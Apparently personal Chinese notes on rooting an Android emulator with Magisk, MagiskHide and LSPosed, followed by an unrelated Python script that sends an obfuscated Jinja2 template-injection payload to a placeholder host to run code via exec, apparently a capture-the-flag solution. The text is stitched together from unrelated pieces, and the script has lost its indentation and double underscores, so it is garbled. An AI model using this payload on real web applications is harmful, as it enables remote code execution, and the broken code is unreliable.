环境安装

模拟器root环境

安装Magisk：安装链接

用于定制Android开源软件，支持高于Android 5.0设备
MagiskSU：为应用程序提供root访问权限
Magisk模块：通过安装模块修改只读分区
MagiskHide：从根检测/系统完整性检查中隐藏Magisk(Shamiko)
MagiskBoot：最完整的安卓启动镜像解包和重新打包工具

安装安卓模拟器：雷电模拟器安装链接

在安卓模拟器中安装Magisk

配置

在其他设置中打开root权限

点击面具

直接退出从进两个都会亮，点击下一步，方式选择安装至系统分区


此时可能会显示失败

在设置中将磁盘共享改为可写入重新执行上述步骤即可

显示完成，重启模拟器即可

重新打开面具，不用管，在设置中将Zygisk打开


刷LSposed模块下载，在模拟器更多中选择共享文件夹，打开电脑文件夹，将Zygisk_-_LSPosed-v1.8.5(6649).zip放在当前目录，在模拟器面具的模块中选择从本地安装，打开文件管理器，找到共享文件夹Pictures，安装成功，重启模拟器

Xposed环境

Frida环境

import sys

import requests

def getstr(s1):
i1 = ""
s5 = ""
for i in s1:
i1 += "i~"
s5 += str(ord(i)) + ","
i1 = i1.strip("~")
s5 = s5.strip(",")
s = f"(({i1})%({s5}))"
return s

payload = 'import("sys").modules["main"].file="/flag"'
payload2 = """{% for i in ( ((g|lower|list|first|urlencode|first)~(g|lower|list|first|urlencode|last|lower)),) %}{% print ( """ + f"""lipsum|attr({getstr("globals")})|attr({getstr("getitem")})({getstr("builtins")})|attr({getstr("getitem")})({getstr("exec")})({getstr(payload)})""" + """ ) %}{% endfor %}"""
data = {"code": payload2}
r = requests.post("http://xxxx/", data=data)
print(r.text)
print(requests.get("http://xxxx/").text)